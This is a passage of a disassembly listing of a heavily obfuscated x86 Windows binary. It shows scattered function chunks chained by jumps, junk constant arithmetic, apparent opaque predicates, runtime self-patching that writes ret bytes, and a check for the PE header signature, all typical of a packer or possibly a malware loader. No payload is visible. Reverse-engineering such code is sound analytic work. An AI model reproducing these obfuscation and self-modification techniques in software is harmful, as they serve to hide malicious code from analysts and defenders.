; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		jmp	loc_43CF2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_441E83:				; CODE XREF: sub_43BA66:loc_43B68Bj
		jnz	loc_43E64D

loc_441E89:				; CODE XREF: y2kk37jd:00441EB7j
		jmp	nullsub_236
; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E840

loc_441E8E:				; CODE XREF: sub_44E840-EE47j
		jmp	sub_440337
; END OF FUNCTION CHUNK	FOR sub_44E840
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E63A

loc_441E93:				; CODE XREF: sub_44E63A-1140Dj
		jmp	loc_45B07B
; END OF FUNCTION CHUNK	FOR sub_44E63A
; ---------------------------------------------------------------------------
		jle	loc_44F355
		jmp	loc_43E645
; ---------------------------------------------------------------------------
		add	ebp, 0F24A5AAFh
		jmp	loc_44C818
; ---------------------------------------------------------------------------

loc_441EAE:				; CODE XREF: y2kk37jd:00451759j
		add	esi, 0CBD858B8h
		xchg	esi, [esp]
		jmp	loc_441E89
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E080
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_441EC2:				; CODE XREF: sub_448DCA+9496j
		jmp	sub_453583
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_441EC7:				; CODE XREF: sub_445787-50FAj
		jmp	sub_444899
; END OF FUNCTION CHUNK	FOR sub_445787
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_236. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		sub	al, 24h
		mov	edx, ebp
		jmp	loc_450241
; ---------------------------------------------------------------------------

loc_441ED6:				; DATA XREF: sub_450CFC:loc_450D1Eo
		jnb	loc_43F7FB
		mov	eax, [ebp-104h]
		cmp	byte ptr [eax],	0
		jnz	loc_43C0D4
		jmp	loc_4536BA
; ---------------------------------------------------------------------------

loc_441EF0:				; CODE XREF: y2kk37jd:0044B98Bj
		add	esi, 22127093h
		sub	esi, 931AD7B8h
		test	esi, 1
		jmp	loc_4516D1
; ---------------------------------------------------------------------------
		mov	ds:off_41E030, eax
		lea	eax, loc_442446
		mov	byte ptr [eax],	0C3h
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_441F16:				; CODE XREF: sub_44D6A5-1662j
		jmp	loc_442446
; END OF FUNCTION CHUNK	FOR sub_44D6A5

; =============== S U B	R O U T	I N E =======================================



sub_441F1B	proc near		; CODE XREF: sub_41A4A1+19p
					; sub_441F1B+5j
					; DATA XREF: ...
		call	sub_441F30
		jmp	ds:off_41E034
sub_441F1B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F60F

loc_441F26:				; CODE XREF: sub_44F60F+10j
		jmp	loc_44CEEF
; END OF FUNCTION CHUNK	FOR sub_44F60F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_441F2B:				; CODE XREF: sub_43EF4F+A803j
		jmp	loc_45BABB
; END OF FUNCTION CHUNK	FOR sub_43EF4F

; =============== S U B	R O U T	I N E =======================================



sub_441F30	proc near		; CODE XREF: sub_4587BA-1B701j
					; sub_441F1Bp ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CA2D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044C353 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044C50A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EAD4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00459594 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045B308 SIZE 0000001A BYTES

		jnb	loc_459594
		jmp	loc_45B308
sub_441F30	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_441F3B:				; CODE XREF: sub_4599BE-113D3j
		push	7BF4993Ch
		pop	edi
		and	edi, 0BE69C790h
		or	edi, 0C3006CE2h
		xor	edi, 0B48CBD04h
		test	edi, 80000h
		jmp	loc_441823
; END OF FUNCTION CHUNK	FOR sub_4599BE

; =============== S U B	R O U T	I N E =======================================



sub_441F5E	proc near		; DATA XREF: sub_43F911:loc_45C70Fo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F698 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00442C6A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444F12 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444F57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CFD9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DB75 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00450B83 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458D9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004594DE SIZE 0000000A BYTES

		mov	eax, [ebp-4]
		cmp	dword ptr [eax], 4550h
		jnz	loc_44D501
		jmp	loc_450B83
sub_441F5E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_441F72:				; CODE XREF: sub_45136B+1Ej
		pop	ebx
		mov	eax, [eax]
		mov	al, [eax]
		js	loc_4439B9
		jmp	loc_44ACCC
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_441F82:				; CODE XREF: sub_454C24-CEA0j
		add	ebx, ebp
		push	edi
		push	7384AF46h
		pop	edi
		xor	edi, 4BE636E6h
		jnz	loc_44A5DE

loc_441F97:				; CODE XREF: sub_445226+B1A7j
		jmp	loc_4456CD
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E677

loc_441F9C:				; CODE XREF: sub_44E677+Aj
		jmp	loc_43DAF5
; END OF FUNCTION CHUNK	FOR sub_44E677
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_441FA1:				; CODE XREF: sub_44CF09:loc_43C826j
					; sub_440FC9+9j ...
		push	offset loc_455BD7
		jmp	nullsub_81
; END OF FUNCTION CHUNK	FOR sub_44CF09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447D42

loc_441FAB:				; CODE XREF: sub_447D42:loc_443321j
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+4+var_4]
		mov	esp, ebp
		pop	ebp
		push	5CC5BA56h
		pop	eax
		jmp	loc_44B9E4
; END OF FUNCTION CHUNK	FOR sub_447D42
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_206. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_441FC0:				; CODE XREF: y2kk37jd:00449F0Bj
		jmp	loc_451D77
; ---------------------------------------------------------------------------

loc_441FC5:				; CODE XREF: y2kk37jd:0043FB09j
		jmp	loc_451076

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_441FCA	proc near		; CODE XREF: sub_445226:loc_4400D8p
					; y2kk37jd:0044160Cj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044408F SIZE 00000016 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		push	94AA0568h
		xchg	ebp, [esp+4+var_4]
		jmp	loc_44408F
sub_441FCA	endp

; ---------------------------------------------------------------------------

locret_441FDC:				; CODE XREF: y2kk37jd:0045823Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453855

loc_441FDD:				; CODE XREF: sub_453855+Dj
		jmp	nullsub_35
; END OF FUNCTION CHUNK	FOR sub_453855
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D56

loc_441FE2:				; CODE XREF: sub_440D56+CBABj
		jmp	loc_442D19
; END OF FUNCTION CHUNK	FOR sub_440D56
; ---------------------------------------------------------------------------

loc_441FE7:				; CODE XREF: y2kk37jd:loc_44C17Bj
		jz	loc_43CCF8
; START	OF FUNCTION CHUNK FOR sub_445226

loc_441FED:				; CODE XREF: sub_445226+10153j
		jmp	loc_44CED1
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		shl	ebp, 1Bh
		mov	edi, ebp
		sub	esi, 0CF1F3277h
		jmp	loc_4438BC

; =============== S U B	R O U T	I N E =======================================



sub_442002	proc near		; CODE XREF: sub_449129+4A3Dp
					; y2kk37jd:0045ADA6j

; FUNCTION CHUNK AT 00446BA1 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi

loc_442006:				; CODE XREF: y2kk37jd:loc_43F410j
		mov	eax, offset dword_449C20
		call	sub_447918
		mov	eax, [ebp-4]
		mov	esp, ebp
		pop	ebp
		jmp	loc_446BA1
sub_442002	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44201B	proc near		; CODE XREF: y2kk37jd:loc_450625j
					; DATA XREF: sub_450618+3o

; FUNCTION CHUNK AT 00440C32 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449451 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D106 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00455499 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004574F1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458B90 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459CCC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B4EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BC4E SIZE 00000006 BYTES

		push	ecx
		push	edx
		push	10120C6Bh
		pop	edx
		or	edx, ds:4000E9h
		test	edx, 4000000h
		jmp	loc_455499
sub_44201B	endp

; ---------------------------------------------------------------------------
		or	ecx, esi
		adc	eax, edx
		jmp	sub_456CD8
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_4411BD
; ---------------------------------------------------------------------------

loc_442043:				; CODE XREF: y2kk37jd:00457B8Bj
		xor	esi, 0D4F1510Fh

; =============== S U B	R O U T	I N E =======================================



sub_442049	proc near		; CODE XREF: y2kk37jd:0044178Ep

; FUNCTION CHUNK AT 00457D00 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		popf
		push	offset sub_4466F8
		jmp	loc_457D00
sub_442049	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_442058:				; CODE XREF: sub_454413+21EDj
		push	20BDF1C0h
		pop	ebx
		sub	ebx, ds:4000F2h
		rol	ebx, 1Eh
		xor	ebx, 0E9694C5Eh
		and	ebx, 0D539F35Fh
		add	ebx, 0FFCECDC6h
		add	eax, ebx
		jmp	loc_448B8D
; END OF FUNCTION CHUNK	FOR sub_454413
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_526. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_442081	proc near		; CODE XREF: y2kk37jd:0044B996j
					; sub_459F8F-8F4Fp

; FUNCTION CHUNK AT 0043F6D3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004438C9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044DDC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004528AC SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045C1E3 SIZE 0000001F BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, 0F8CD9A12h
		mov	eax, [eax]
		mov	al, [eax]
		jmp	loc_45C1E3
sub_442081	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		rol	edi, 16h
		xchg	ebx, ecx
		jmp	sub_44ECA8
; ---------------------------------------------------------------------------

loc_44209E:				; CODE XREF: y2kk37jd:00443DA7j
		jno	loc_44E003
; START	OF FUNCTION CHUNK FOR sub_45AAD1

loc_4420A4:				; CODE XREF: sub_45AAD1+Ej
		add	ebx, 3EEE44C4h
		add	ebx, ebp
		add	ebx, 0B4646633h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_445A60
; END OF FUNCTION CHUNK	FOR sub_45AAD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_4420BA:				; CODE XREF: sub_4577FE-10D43j
		jb	loc_443E8B
		push	0B2B7DD7Eh
; END OF FUNCTION CHUNK	FOR sub_4577FE

; =============== S U B	R O U T	I N E =======================================



sub_4420C5	proc near		; CODE XREF: sub_449E69+EB26j
					; sub_4577FE:loc_459A94j

var_8		= dword	ptr -8

		push	ebx
		push	0E04980B5h
		xchg	edi, [esp+8+var_8]
		jmp	loc_45C4CD
sub_4420C5	endp


; =============== S U B	R O U T	I N E =======================================



sub_4420D3	proc near		; DATA XREF: sub_44A3E7+7o

var_4		= dword	ptr -4

		mov	eax, [esp+0]
		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		nop
		mov	eax, 23829242h
		call	sub_45C250
sub_4420D3	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44113A

loc_4420E7:				; CODE XREF: sub_44F2A0+16j
		jz	loc_446355
		jmp	loc_446392
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4420F2:				; CODE XREF: sub_445226:loc_449D9Dj
		jnz	loc_43E470
		jmp	loc_4476D0
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_4420FD:				; CODE XREF: sub_443BAF-321j
		pop	esi
		and	esi, 50A0417h
		add	esi, 6ED71236h
		and	esi, 19CAEE7Eh
		add	esi, 0CA559B33h
		jmp	loc_451FBC
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_44211B:				; CODE XREF: sub_43ED86+11A1Cj
		and	edx, 2CE057FCh
		mov	ecx, edx
		jmp	loc_4546DC
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_442128:				; CODE XREF: sub_44CF38:loc_451A0Cj
		jl	loc_45A1B1

loc_44212E:				; CODE XREF: y2kk37jd:0045C321j
		jmp	loc_44AE9A
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_442133:				; CODE XREF: sub_445226+63DCj
		jmp	loc_444E57
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443DE1

loc_442138:				; CODE XREF: sub_443DE1+Dj
		jmp	sub_43BA66
; END OF FUNCTION CHUNK	FOR sub_443DE1
; ---------------------------------------------------------------------------
		mov	ecx, edx
		jno	loc_44C74B
		sbb	ebx, 0CBECB344h
		jmp	loc_45A1AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_442150:				; CODE XREF: sub_44610D:loc_457AC1j
		lea	eax, loc_443D3C
		mov	byte ptr [eax],	0C3h
		jmp	loc_443D3C
; END OF FUNCTION CHUNK	FOR sub_44610D

; =============== S U B	R O U T	I N E =======================================



sub_44215E	proc near		; CODE XREF: sub_40D27E+40p
					; sub_410D1B+2Dp ...
		call	sub_43D5FE
		jmp	ds:off_41E074
sub_44215E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_442169:				; CODE XREF: sub_44B03F-54D3j
		jmp	loc_45011F
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
		mov	eax, 22143682h
		call	sub_442C3E
		mov	ds:dword_41E168, eax
		push	offset loc_441423
		jmp	locret_44A7FB
; ---------------------------------------------------------------------------

loc_442188:				; DATA XREF: sub_43EDE5+13D38o
		mov	eax, [eax]
		push	edx
		pushf
		push	760FE075h
		pop	edx
		jmp	loc_4527E4
; ---------------------------------------------------------------------------

loc_442197:				; CODE XREF: y2kk37jd:0044DDF0j
		jo	loc_44692C
; START	OF FUNCTION CHUNK FOR sub_45AC8D

loc_44219D:				; CODE XREF: sub_45AC8D:loc_44DDD4j
		add	esi, 5C7A315Bh
		call	sub_440E51

loc_4421A8:				; CODE XREF: sub_44D54D+D9F5j
		jmp	sub_43C326
; END OF FUNCTION CHUNK	FOR sub_45AC8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_4421AD:				; CODE XREF: sub_446AE2+5j
		jmp	loc_450153
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_4421B2:				; CODE XREF: y2kk37jd:loc_45C18Fj
		jge	loc_457767

loc_4421B8:				; CODE XREF: y2kk37jd:0044C4E9j
		jmp	loc_447222
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_4421BD:				; CODE XREF: sub_4447EA+2D1Cj
		jmp	loc_43D07B
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
		mov	eax, [edx]
		pop	ebx
		adc	esi, 7CEB73C7h
		jmp	loc_457767
; ---------------------------------------------------------------------------

loc_4421D0:				; CODE XREF: y2kk37jd:004409F2j
		jge	loc_447A53
		sub	ebx, 63EEBAC3h

; =============== S U B	R O U T	I N E =======================================



sub_4421DC	proc near		; CODE XREF: sub_446861+3p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BF4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B590 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452EB3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455A00 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004568FB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00457EB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F19 SIZE 0000001F BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	esi
		jmp	loc_458F19
sub_4421DC	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_184. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_4421E7:				; CODE XREF: y2kk37jd:0045B0BBj
					; sub_45B41E+23Cj
		jmp	loc_4490D6
; END OF FUNCTION CHUNK	FOR sub_45B41E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590D6

loc_4421EC:				; CODE XREF: sub_4590D6+11j
		jmp	loc_445A89
; END OF FUNCTION CHUNK	FOR sub_4590D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_4421F1:				; CODE XREF: sub_44AD49:loc_443D61j
		rol	eax, 0Ch
		xor	eax, 912A4656h
		add	eax, ebp
		add	eax, 30598077h
		popf
		push	eax
		call	sub_43CA5B
		jmp	loc_445B21
; END OF FUNCTION CHUNK	FOR sub_44AD49
; ---------------------------------------------------------------------------
		popf
		jmp	loc_454B3C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_192. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_442215:				; CODE XREF: y2kk37jd:004457BEj
		jmp	sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_44221A:				; CODE XREF: sub_4554E9-E65Ej
		push	ecx
		push	668C3751h
		pop	ecx
		or	ecx, 794CF7Ah
		rol	ecx, 14h
		jmp	loc_448D1D
; END OF FUNCTION CHUNK	FOR sub_4554E9
; ---------------------------------------------------------------------------
		test	ebx, 0EA2A8894h
		jmp	loc_440678
; ---------------------------------------------------------------------------

loc_44223A:				; DATA XREF: sub_44346B:loc_43EA07o
		jmp	loc_453A7C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_44223F:				; CODE XREF: sub_44346B+128Bj
					; y2kk37jd:00454CECj
		pop	ecx
		call	sub_454692

loc_442245:				; CODE XREF: sub_442C0A+127F7j
		jmp	loc_43E9B7
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC21

loc_44224A:				; CODE XREF: sub_44EC21+16j
		jmp	loc_45667E
; END OF FUNCTION CHUNK	FOR sub_44EC21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E049

loc_44224F:				; CODE XREF: sub_43E049+7CF8j
		jle	loc_4468FA
		or	esi, ebp
		jmp	loc_44D03F
; END OF FUNCTION CHUNK	FOR sub_43E049
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45392D

loc_44225C:				; CODE XREF: sub_45392D+18j
		rol	eax, 0Fh
		push	offset sub_451E7E
		jmp	loc_43E3BE
; END OF FUNCTION CHUNK	FOR sub_45392D
; ---------------------------------------------------------------------------

loc_442269:				; CODE XREF: y2kk37jd:loc_4591DCj
		add	eax, 88705567h
		xchg	eax, [esp]
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_442277:				; CODE XREF: sub_453583:loc_445CA2j
		push	offset loc_44A305
		jmp	loc_453789
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4552EB

loc_442281:				; CODE XREF: sub_4552EB-2AC2j
		jnz	loc_44AC18
		jmp	loc_43CDEB
; END OF FUNCTION CHUNK	FOR sub_4552EB
; ---------------------------------------------------------------------------

locret_44228C:				; CODE XREF: y2kk37jd:loc_4525E2j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44228D:				; CODE XREF: sub_43BD0D+16983j
		jmp	loc_44EA47
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_442292:				; CODE XREF: sub_44610D-23C6j
		push	offset loc_455346
		jmp	loc_44DB6B
; END OF FUNCTION CHUNK	FOR sub_44610D

; =============== S U B	R O U T	I N E =======================================



sub_44229C	proc near		; CODE XREF: sub_4415D8j
					; DATA XREF: sub_43C9E7+4BE7o

; FUNCTION CHUNK AT 00448491 SIZE 00000019 BYTES

		add	eax, 0FB493A03h
		call	sub_43E456

loc_4422A7:				; CODE XREF: sub_44AFF6:loc_43D820j
		jmp	loc_448491
sub_44229C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4422AC:				; CODE XREF: y2kk37jd:loc_456CD3j
		jz	loc_44B981
		jmp	loc_43DC4C
; ---------------------------------------------------------------------------
		cmp	ebx, 0B9DFEAh
		jmp	loc_454B27
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_130. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4422C3:				; CODE XREF: sub_4411C3-AD1j
		mov	edi, eax
		sbb	ecx, edx
		push	ebx

loc_4422C8:				; CODE XREF: sub_4411C3:loc_43BF54j
					; y2kk37jd:004414EAj ...
		jmp	loc_4512DE
; ---------------------------------------------------------------------------

loc_4422CD:				; CODE XREF: y2kk37jd:00445ABDj
					; sub_4411C3+16825j
		pop	ecx
		call	sub_446052

loc_4422D3:				; CODE XREF: y2kk37jd:0044E635j
		jmp	loc_458736
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DDE

loc_4422D8:				; CODE XREF: sub_455DDE:loc_44C35Fj
		xchg	ebp, [esp+0]
		push	ebp
		pop	ecx
		pop	ebp
		xchg	eax, [esp-4+arg_0]

loc_4422E1:				; CODE XREF: sub_43ED19:loc_44BA03j
		jmp	loc_44CDC9
; END OF FUNCTION CHUNK	FOR sub_455DDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2F9

loc_4422E6:				; CODE XREF: sub_45A2F9:loc_443ED6j
		jns	loc_4505EF
		or	eax, edi
		cmp	edx, 0E941B8E3h
		jmp	loc_45ACCE
; END OF FUNCTION CHUNK	FOR sub_45A2F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449734

loc_4422F9:				; CODE XREF: sub_449734:loc_4470B0j
		test	ebx, 400000h
		jmp	loc_44030D
; END OF FUNCTION CHUNK	FOR sub_449734
; ---------------------------------------------------------------------------

loc_442304:				; CODE XREF: y2kk37jd:00441743j
		jns	loc_4434AE
		push	edx
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_44230B:				; CODE XREF: sub_4577FE-160CCj
		xor	ecx, 0C8C9E9Dh
		xchg	ecx, [esp+0]
		jmp	loc_45A6D7
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_442319:				; CODE XREF: sub_45689F:loc_450FD0j
		pushf

loc_44231A:				; CODE XREF: y2kk37jd:loc_4442BFj
		push	9E11577Fh
		pop	esi
		rol	esi, 0Fh
		and	esi, 0A0ED4AA7h
		jmp	loc_4452DF
; ---------------------------------------------------------------------------

loc_44232E:				; CODE XREF: sub_45689F+45C7j
		jz	loc_43D804
		jmp	loc_43B95C
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_442339:				; CODE XREF: sub_43C335+B62Bj
					; sub_43C335:loc_4580BAj
		call	sub_45405E
		push	2026AD51h
		pop	edx
		xor	edx, 11558B1Fh
		jnz	loc_448E1E

loc_442350:				; CODE XREF: sub_43B609+3j
		jmp	nullsub_236
; END OF FUNCTION CHUNK	FOR sub_43C335
; ---------------------------------------------------------------------------
		add	edi, ebp
		jmp	loc_44780F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B2D

loc_44235C:				; CODE XREF: sub_454B2D+Aj
		or	ecx, 0C040417Fh
		and	ecx, ds:4000EAh
		add	ecx, 80430C7Ch
		xchg	ecx, [esp+0]
		jmp	loc_455B2E
; END OF FUNCTION CHUNK	FOR sub_454B2D

; =============== S U B	R O U T	I N E =======================================



sub_442376	proc near		; CODE XREF: y2kk37jd:00448AD3j
					; y2kk37jd:00456BFCp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CA61 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043DDFE SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043F0BC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440507 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441966 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A3E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F717 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454EB6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00456A28 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045786E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459030 SIZE 00000005 BYTES

		xchg	eax, [esp+4+var_4]
		pop	eax
		test	al, al
		jz	loc_440507
		jmp	loc_43F0BC
sub_442376	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44289F

loc_442387:				; CODE XREF: sub_456D3F:loc_44EB2Ej
					; sub_44289F+14CFAj
		push	401447BDh
		call	sub_43EDE5
; END OF FUNCTION CHUNK	FOR sub_44289F
; START	OF FUNCTION CHUNK FOR sub_44023C

loc_442391:				; CODE XREF: sub_44023C+AC52j
		jmp	loc_456B31
; END OF FUNCTION CHUNK	FOR sub_44023C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_442396:				; CODE XREF: sub_4411C3:loc_43E9D8j
		pop	eax
		and	eax, 8415009Dh

loc_44239D:				; CODE XREF: sub_445226-3B32j
		sub	eax, 0ED9D1910h
		or	eax, 0C43A44h
		and	eax, 5C562F16h
		jmp	loc_44782D
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_4423B4	proc near		; DATA XREF: sub_43C7B9+15D3Ao

; FUNCTION CHUNK AT 004404CC SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		jmp	loc_4404CC
sub_4423B4	endp

; ---------------------------------------------------------------------------
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_455413
		jmp	loc_45B801
; ---------------------------------------------------------------------------
		mov	ebp, 0A164F7B7h
		jmp	sub_4580F2
; ---------------------------------------------------------------------------

loc_4423D8:				; CODE XREF: y2kk37jd:0044EB29j
		xchg	ebp, edx

; =============== S U B	R O U T	I N E =======================================



sub_4423DA	proc near		; CODE XREF: sub_4411C3+A81Cp

; FUNCTION CHUNK AT 0043D3AD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00449E3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458C24 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	edi, (offset loc_451D51+5)
		jmp	loc_458C24
sub_4423DA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_4423E9:				; CODE XREF: sub_451634+9B8Aj
		jl	loc_4480E9
